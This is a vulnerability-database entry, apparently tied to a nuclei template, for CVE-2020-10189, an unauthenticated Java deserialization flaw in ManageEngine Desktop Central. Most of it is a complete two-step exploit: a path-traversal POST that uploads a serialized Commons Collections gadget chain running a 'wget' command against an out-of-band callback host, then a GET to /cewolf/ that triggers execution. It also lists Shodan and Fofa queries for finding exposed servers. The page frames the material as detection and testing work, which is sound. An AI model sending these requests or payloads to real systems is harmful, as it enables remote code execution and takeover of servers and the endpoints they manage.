🔙 목록으로 돌아가기

CVE-2020-10189: ManageEngine Desktop Central Java Deserialization

TitleManageEngine Desktop Central Java Deserialization
Authorking-alexander
SeverityCritical
ImpactUnauthenticated attackers can execute arbitrary code on Zoho ManageEngine Desktop Central servers, leading to complete system compromise and access to all managed endpoints.
RemediationUpgrade to ManageEngine Desktop Central Build 10.0.474 or later.
CVSS Score9.8
EPSS Score0.94248
CVE IDCVE-2020-10189
CWE IDCWE-502
Shodan Queryhttp.title:"manageengine desktop central 10"
Fofa Querybody="manageengine desktop central 10"title="manageengine desktop central 10"app="zoho-manageengine-desktop"
Tags cve cve2020 kev zoho manageengine deserialization intrusive vkev vuln

🔍 Vulnerability Description

Zoho ManageEngine Desktop Central before 10.0.474 is vulnerable to a deserialization of untrusted data, which permits remote code execution.

🌐 HTTP Request

POST /mdm/client/v1/mdmLogUploader?udid=si%5C..%5C..%5C..%5Cwebapps%5CDesktopCentral%5C_chart&filename=logger.zip HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.5.20) Gecko/ Firefox/3.6.17
Connection: close
Content-Length: 1363
Content-Type: application/octet-stream
Accept-Encoding: gzip

��srjava.util.HashSet�D�����4xpw?@sr4org.apache.commons.collections.keyvalue.TiedMapEntry��қ9��LkeytLjava/lang/Object;LmaptLjava/util/Map;xpt&https://github.com/joaomatosf/jexboss sr*org.apache.commons.collections.map.LazyMapn唂�y�Lfactoryt,Lorg/apache/commons/collections/Transformer;xpsr:org.apache.commons.collections.functors.ChainedTransformer0Ǘ�(z�[
iTransformerst-[Lorg/apache/commons/collections/Transformer;xpur-[Lorg.apache.commons.collections.Transformer;�V*��4�xpsr;org.apache.commons.collections.functors.ConstantTransformerXv�A��L	iConstantq~xpvrjava.lang.Runtimexpsr:org.apache.commons.collections.functors.InvokerTransformer���k{|�8[iArgst[Ljava/lang/Object;LiMethodNametLjava/lang/String;[iParamTypest[Ljava/lang/Class;xpur[Ljava.lang.Object;��X�s)lxpt
getRuntimeur[Ljava.lang.Class;�׮��Z�xpt	getMethoduq~vrjava.lang.String��8z;�Bxpvq~sq~uq~puq~tinvokeuq~vrjava.lang.Objectxpvq~sq~ur[Ljava.lang.String;��V��{Gxpt7wget http://d5jodbhle0o2694d5tc0ezogxedkywyot.oast.sitetexecuq~q~ sq~srjava.lang.Integer⠤���8Ivaluexrjava.lang.Number������xpsrjava.util.HashMap���`�F
loadFactorI	thresholdxp?@wxxx
GET /cewolf/?img=%5Clogger.zip HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5.1 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-10189.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-10189.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A